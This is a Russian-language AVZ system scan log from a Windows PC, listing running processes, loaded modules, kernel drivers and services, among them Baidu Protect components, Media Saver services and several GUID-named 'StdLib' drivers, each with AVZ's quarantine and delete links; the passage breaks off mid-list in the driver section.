Протокол исследования системы

AVZ 4.46 http://z-oleg.com/secur/avz/

Список процессов

Имя файлаPIDОписаниеCopyrightMD5Информация
c:\users\Владислав\desktop\autologger\autologger.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3612Автоматический сборщик логовВсе права на AutoLogger принадлежат regist & Drongo © Copyright 2013 - 20154623F06A30BFF2FB28AB790F313C726511723.20 кб, rsAh,создан: 14.04.2016 11:32:37,изменен: 14.04.2016 04:33:02,имя содержит национальные символы
Командная строка:
"C:\Users\Владислав\Desktop\AutoLogger\AutoLogger.exe"
c:\program files (x86)\common files\baidu\baiduprotect1.3\1.3.0.602\baiduprotect.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
736??????????Copyright (C) 2013 Baidu Inc.6158B0A06F076DE1869F094A67310C5A1878.60 кб, rsAh,создан: 23.12.2014 19:45:49,изменен: 23.12.2014 19:45:48
Командная строка:
"C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe" -r
c:\windows\syswow64\lpclient.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
1964  8217320B18033842D4A79DEE048C6243301.00 кб, rsAh,создан: 02.01.2014 00:48:42,изменен: 02.08.2013 07:50:41
Командная строка:
"C:\Windows\SysWOW64\lpclient.exe" /Svc
c:\program files (x86)\media saver\basement\mslserver.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3016  0842AD6102BC4D0A6C521503B1A04BEC172.01 кб, rsAh,создан: 13.01.2015 17:40:48,изменен: 13.01.2015 17:40:48
Командная строка:
"C:\Program Files (x86)\Media Saver\Basement\MSLServer.exe"
c:\program files (x86)\media saver\basement\mslsservice.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
1452  5F00545A19052CB85F24B283F0F4162674.51 кб, rsAh,создан: 13.01.2015 17:40:48,изменен: 13.01.2015 17:40:48
Командная строка:
"C:\Program Files (x86)\Media Saver\Basement\MSLSService.exe"
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3044Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=gpu-process --channel="2880.0.2119134540\1663165305" --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --supports-dual-gpus=false --gpu-driver-bug-workarounds=3,14,31,60 --gpu-vendor-id=0x1002 --gpu-device-id=0x68d9 --gpu-driver-vendor="Advanced Micro Devices, Inc." --gpu-driver-version=13.200.0.0 --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --ignored=" --type=renderer "
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3080Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.2.1363566271\188403658"
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3088Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.3.617472246\1563225620"
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
4028Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --extension-process --enable-webrtc-hw-h264-encoding --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.4.1429595856\244991037"
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
1940Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.5.751183880\449359839"
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
356Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.10.1932977831\1974985451"
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3224Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=renderer --alt-high-dpi-setting=96 --system-dpi-setting=96 --disable-direct-npapi-requests --lang=ru --disable-client-side-phishing-detection --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --device-scale-factor=1 --num-raster-threads=2 --content-image-texture-target=3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553,3553 --video-image-texture-target=3553 --channel="2880.13.1026235624\1530003683"
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
612Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" --type=ppapi --channel="2880.15.751496515\2138858163" --ppapi-flash-args --lang=ru --device-scale-factor=1 --with-feature:installer-experiment-test=off --with-feature:installer-ui-stats=on --with-feature:installer-hide-from-program-and-features=off --with-feature:installer-pref-default-overrides-support=off --crash-reporter-pid=3112 --ignored=" --type=renderer "
c:\progra~2\opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
2880Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera.exe" -noautoupdate --ran-launcher -- http://google.ru/
C:\Program Files (x86)\Opera\36.0.2130.46\opera.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3104Opera Internet BrowserCopyright Opera Software 201641B7B1BFB83D92EC2CD4D66B760E4DDA633.04 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:14
Командная строка:
c:\progra~2\opera\36.0.2130.46\opera_crashreporter.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
3112Opera crash-reporterCopyright Opera Software 20161017F1DFE47DB1D1FA5F88046275A270507.54 кб, rsAh,создан: 05.04.2016 16:36:21,изменен: 05.04.2016 16:36:15
Командная строка:
"C:\PROGRA~2\Opera\36.0.2130.46\opera_crashreporter.exe" -noautoupdate --ran-launcher --crash-reporter-parent-id=2880 -- http://google.ru/
c:\program files (x86)\skype\phone\skype.exe
Скрипт: Kарантин, Удалить, Удалить через BC, Завершить
2312Skype © 2003 - 2012 Skype and/or Microsoft66B14E1EA59D93A53B7C07038EE44AD352463.11 кб, RsAh,создан: 07.08.2015 20:35:52,изменен: 07.08.2015 20:35:52
Командная строка:
"C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
Обнаружено:57, из них опознаны как безопасные 41
Имя модуляHandleОписаниеCopyrightAVZ0311Используется процессами
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\7z.dll
Скрипт: Kарантин, Удалить, Удалить через BC
1811283968????????????Copyright (C) 2013 Baidu Inc.MD5=17B7588B88B50A5E0A0E17C15A3A02C8
359.88 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\ad.dll
Скрипт: Kарантин, Удалить, Удалить через BC
73531392ADCopyright (C) 2013 Baidu Inc.MD5=A33CD47BA4FB268EEA08D78D407072DB
462.38 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BDKitUtils.dll
Скрипт: Kарантин, Удалить, Удалить через BC
11206656Driver InterfaceCopyright (C) 2012 - 2013 Baidu Inc.MD5=D0AC64F41ABB41889AEB9E182DAF6877
60.82 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BDLogicUtils.dll
Скрипт: Kарантин, Удалить, Удалить через BC
268435456??????Copyright (C) 2013 Baidu Inc.MD5=6DE9CEADB9A3F3B25E5083BA321FD0C7
742.38 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BDMNet.dll
Скрипт: Kарантин, Удалить, Удалить через BC
63635456??????Copyright (C) 2013 Baidu Inc.MD5=6FDFBF55B1736B282AB68198C65697C8
1202.38 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BDMReport.dll
Скрипт: Kарантин, Удалить, Удалить через BC
57081856??????Copyright (C) 2013 Baidu Inc.MD5=5BFC31A70527A0B68FFD348F502DC3B2
1066.38 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\DriverManager.dll
Скрипт: Kарантин, Удалить, Удалить через BC
16056320??????Copyright (C) 2013 Baidu Inc.MD5=48D9F95B54CB0A8544E3699BCE72CF01
174.38 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\dynplugins\BbSavior.dll
Скрипт: Kарантин, Удалить, Удалить через BC
47710208 Copyright (C) 2015MD5=386141CBF658E8137ADD7BF23D2E51FA
74.88 кб, rsah, создан: 24.04.2015 16:23:25, изменен: 24.04.2015 15:33:14
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\dynplugins\BrowserProbe.dll
Скрипт: Kарантин, Удалить, Удалить через BC
45350912 Copyright (C) 2015MD5=911AB4BD71E7EC40BCBCFFA1821D3E9C
138.88 кб, rsAh, создан: 10.12.2015 16:39:31, изменен: 09.12.2015 15:23:52
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\plugins\BaiduRepair.dll
Скрипт: Kарантин, Удалить, Удалить через BC
17825792??????????Copyright (C) 2013 Baidu Inc.MD5=53CEFD9FBB45CFCE6466521EB0618D93
174.38 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\plugins\HIPS.dll
Скрипт: Kарантин, Удалить, Удалить через BC
83296256??????????Copyright (C) 2013 Baidu Inc.MD5=DED74663861EA7EF22056115F70BD40C
2002.38 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\SafeBrowserDll.dll
Скрипт: Kарантин, Удалить, Удалить через BC
11665408????????Copyright 2013 Baidu, Inc. All Rights ReservedMD5=23E6942FA11DC181D740B2E2D5A8B668
324.82 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
736
C:\PROGRA~2\Opera\36.0.2130.46\D3DCompiler_47.dll
Скрипт: Kарантин, Удалить, Удалить через BC
1833369600Direct3D HLSL Compiler for Redistribution© Microsoft Corporation. All rights reserved.MD5=6361E380A69603B5042CE6ED1941C47D
3613.54 кб, rsAh, создан: 05.04.2016 16:36:20, изменен: 05.04.2016 16:36:02
3044
C:\PROGRA~2\Opera\36.0.2130.46\libegl.dll
Скрипт: Kарантин, Удалить, Удалить через BC
1831075840ANGLE libEGL Dynamic Link LibraryCopyright (C) 2015 Google Inc.MD5=71CBF43686726CF46CC1C162DF14ADC7
80.54 кб, rsAh, создан: 05.04.2016 16:36:21, изменен: 05.04.2016 16:36:02
3044
C:\PROGRA~2\Opera\36.0.2130.46\libglesv2.dll
Скрипт: Kарантин, Удалить, Удалить через BC
1831206912ANGLE libGLESv2 Dynamic Link LibraryCopyright (C) 2015 Google Inc.MD5=455144C015FF9F8E527D7C4874CC736E
2084.54 кб, rsAh, создан: 05.04.2016 16:36:21, изменен: 05.04.2016 16:36:02
3044
C:\PROGRA~2\Opera\36.0.2130.46\opera.dll
Скрипт: Kарантин, Удалить, Удалить через BC
1721630720  MD5=85A551F183BA8C0CD527FA8F1527C31C
62332.54 кб, rsAh, создан: 05.04.2016 16:36:21, изменен: 05.04.2016 16:36:14
3044, 3080, 3088, 4028, 1940, 356, 3224, 612, 2880
C:\Windows\SysWOW64\Macromed\Flash\Flash32_21_0_0_213.ocx
Скрипт: Kарантин, Удалить, Удалить через BC
1861550080Adobe Flash Player 21.0 r0Adobe® Flash® Player. Copyright © 1996-2016 Adobe Systems Incorporated. All Rights Reserved. Adobe and Flash are either trademarks or registered trademarks in the United States and/or other countries.MD5=8EF9C8E765C9BFC9F106CEB145E36E50
19016.69 кб, RsAh, создан: 10.04.2016 14:36:15, изменен: 10.04.2016 14:36:15
2312
C:\Windows\SysWOW64\Macromed\Flash\pepflashplayer32_21_0_0_213.dll
Скрипт: Kарантин, Удалить, Удалить через BC
1657339904  MD5=94BFE8EC857D380F21D8BD2231C9BBAD
17121.19 кб, rsAh, создан: 10.04.2016 18:36:37, изменен: 10.04.2016 18:36:37
612
Обнаружено модулей:213, из них опознаны как безопасные 195

Модули пространства ядра

МодульБазовый адресРазмер в памятиОписаниеПроизводитель
C:\Windows\system32\DRIVERS\bd0004.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
F088000D3B000 (13873152)bd0004 x64Copyright (c) 2013-2014 Baidu. All Rights Reserved.
C:\Windows\System32\Drivers\BDArKit.SYS
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
39D2000029000 (167936)BDArKitCopyright (C) 2012 - 2013 Baidu Inc.
C:\Windows\system32\DRIVERS\BDMWrench.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
665B00003C000 (245760)????????Copyright 2014 Baidu, Inc. All Rights Reserved
C:\Windows\System32\Drivers\dump_atapi.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
490C000009000 (36864)
C:\Windows\System32\Drivers\dump_dumpata.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
490000000C000 (49152)
C:\Windows\System32\Drivers\dump_dumpfve.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
4915000013000 (77824)
C:\Windows\system32\drivers\{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
F07900000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
180000000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{34789ec0-129d-4a2d-b089-9977cdae65db}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
183800000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{3560b757-0519-45b3-a215-cfb94afd0821}Gw64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
185400000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
FDEF00000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{955a1491-962c-4a4d-a25b-ddfc77991b58}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
182A00000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{9d525140-2aa5-4c29-b571-058468248f69}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
180E00000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
19EE00000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{c0915853-fd66-4086-a9ce-b80496d49b3f}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
184600000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
FDE100000E000 (57344)StdLibCopyright © 2013 StdLib
C:\Windows\system32\drivers\{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
181C00000E000 (57344)StdLibCopyright © 2013 StdLib
Обнаружено модулей - 203, опознано как безопасные - 186

Службы

СлужбаОписаниеСтатусФайлГруппаЗависимости
BDSGRTP
Служба: Стоп, Удалить, Отключить, Удалить через BC
BDSGRTP ServiceРаботаетC:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.602\BaiduProtect.exe
1878.60 кб, rsAh, создан: 23.12.2014 19:45:49, изменен: 23.12.2014 19:45:48
Скрипт: Kарантин, Удалить, Удалить через BC
COM Infrastructure 
Local Policy Client
Служба: Стоп, Удалить, Отключить, Удалить через BC
Local Policy ClientРаботаетC:\Windows\SysWOW64\lpclient.exe
301.00 кб, rsAh, создан: 02.01.2014 00:48:42, изменен: 02.08.2013 07:50:41
Скрипт: Kарантин, Удалить, Удалить через BC
  
MSLSService
Служба: Стоп, Удалить, Отключить, Удалить через BC
MSLSServiceРаботаетC:\Program Files (x86)\Media Saver\Basement\MSLSService.exe
74.51 кб, rsAh, создан: 13.01.2015 17:40:48, изменен: 13.01.2015 17:40:48
Скрипт: Kарантин, Удалить, Удалить через BC
  
PnkBstrA
Служба: Стоп, Удалить, Отключить, Удалить через BC
PnkBstrAРаботаетC:\Windows\system32\PnkBstrA.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
  
AdobeFlashPlayerUpdateSvc
Служба: Стоп, Удалить, Отключить, Удалить через BC
Adobe Flash Player Update ServiceНе запущенC:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
263.19 кб, rsAh, создан: 10.01.2014 21:40:51, изменен: 10.04.2016 18:36:38
Скрипт: Kарантин, Удалить, Удалить через BC
  
gupdate
Служба: Стоп, Удалить, Отключить, Удалить через BC
Служба Google Update (gupdate)Не запущенC:\Program Files (x86)\Google\Update\GoogleUpdate.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
 RPCSS
gupdatem
Служба: Стоп, Удалить, Отключить, Удалить через BC
Служба Google Update (gupdatem)Не запущенC:\Program Files (x86)\Google\Update\GoogleUpdate.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
 RPCSS
Обнаружено - 169, опознано как безопасные - 162

Драйверы

СлужбаОписаниеСтатусФайлГруппаЗависимости
bd0004
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
bd0004РаботаетC:\Windows\system32\DRIVERS\bd0004.sys
164.82 кб, rsAh, создан: 23.12.2014 19:45:54, изменен: 23.12.2014 19:45:49
Скрипт: Kарантин, Удалить, Удалить через BC
bddriver 
BDArKit
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
BAIDU Ark Kit ServiceРаботаетC:\Windows\system32\DRIVERS\BDArKit.sys
148.82 кб, rsAh, создан: 22.01.2015 18:41:39, изменен: 26.12.2014 23:02:17
Скрипт: Kарантин, Удалить, Удалить через BC
bddriver 
BDSafeBrowser
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
BDSafeBrowserНе запущенBDSafeBrowser.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
  
{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64РаботаетC:\Windows\system32\drivers\{09c3ffd6-f1a3-4fde-86e1-d448e8559c21}w64.sys
47.69 кб, rsAh, создан: 10.03.2015 14:18:20, изменен: 10.03.2015 00:28:38
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64РаботаетC:\Windows\system32\drivers\{1a7531da-31ad-48c5-8d60-be70ecfbab93}w64.sys
47.69 кб, rsAh, создан: 25.02.2015 19:58:43, изменен: 24.02.2015 22:20:52
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{34789ec0-129d-4a2d-b089-9977cdae65db}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{34789ec0-129d-4a2d-b089-9977cdae65db}w64РаботаетC:\Windows\system32\drivers\{34789ec0-129d-4a2d-b089-9977cdae65db}w64.sys
47.69 кб, rsAh, создан: 13.02.2015 17:49:57, изменен: 12.02.2015 23:27:18
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{3560b757-0519-45b3-a215-cfb94afd0821}Gw64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{3560b757-0519-45b3-a215-cfb94afd0821}Gw64РаботаетC:\Windows\system32\drivers\{3560b757-0519-45b3-a215-cfb94afd0821}Gw64.sys
47.69 кб, rsAh, создан: 06.02.2015 12:23:29, изменен: 05.02.2015 17:29:20
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64РаботаетC:\Windows\system32\drivers\{4bcd2e21-b225-4bad-81f4-2c4a7013cd87}w64.sys
47.69 кб, rsAh, создан: 04.03.2015 15:10:47, изменен: 04.03.2015 00:26:42
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{955a1491-962c-4a4d-a25b-ddfc77991b58}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{955a1491-962c-4a4d-a25b-ddfc77991b58}w64РаботаетC:\Windows\system32\drivers\{955a1491-962c-4a4d-a25b-ddfc77991b58}w64.sys
47.69 кб, rsAh, создан: 17.02.2015 08:51:55, изменен: 16.02.2015 05:26:48
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{9d525140-2aa5-4c29-b571-058468248f69}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{9d525140-2aa5-4c29-b571-058468248f69}w64РаботаетC:\Windows\system32\drivers\{9d525140-2aa5-4c29-b571-058468248f69}w64.sys
47.69 кб, rsAh, создан: 23.02.2015 09:50:00, изменен: 22.02.2015 18:42:06
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64РаботаетC:\Windows\system32\drivers\{bab3007b-75f3-4020-8eee-4c923fdcb91b}w64.sys
47.69 кб, rsAh, создан: 28.02.2015 22:01:37, изменен: 28.02.2015 05:15:02
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{c0915853-fd66-4086-a9ce-b80496d49b3f}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{c0915853-fd66-4086-a9ce-b80496d49b3f}w64РаботаетC:\Windows\system32\drivers\{c0915853-fd66-4086-a9ce-b80496d49b3f}w64.sys
47.69 кб, rsAh, создан: 08.02.2015 19:26:17, изменен: 07.02.2015 21:29:18
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64РаботаетC:\Windows\system32\drivers\{d487b1e4-59cf-4940-87da-e7c5a283dab7}w64.sys
47.69 кб, rsAh, создан: 06.03.2015 21:00:18, изменен: 06.03.2015 04:19:18
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64РаботаетC:\Windows\system32\drivers\{e85a0e97-fa40-4dc4-a79e-e1c1cabe72eb}w64.sys
47.69 кб, rsAh, создан: 19.02.2015 14:18:36, изменен: 18.02.2015 23:44:36
Скрипт: Kарантин, Удалить, Удалить через BC
PNP_TDI 
bd0002
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
bd0002Не запущенC:\Windows\system32\DRIVERS\bd0002.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
bddriver 
BDEnhanceBoost
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
BDEnhanceBoostНе запущенC:\Windows\system32\drivers\BDEnhanceBoost.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
  
BDMNetMon
Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC
BDMNetMonНе запущенC:\Windows\system32\DRIVERS\BDMNetMon.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
NetworkProviderBFE
BDMWrench_x64
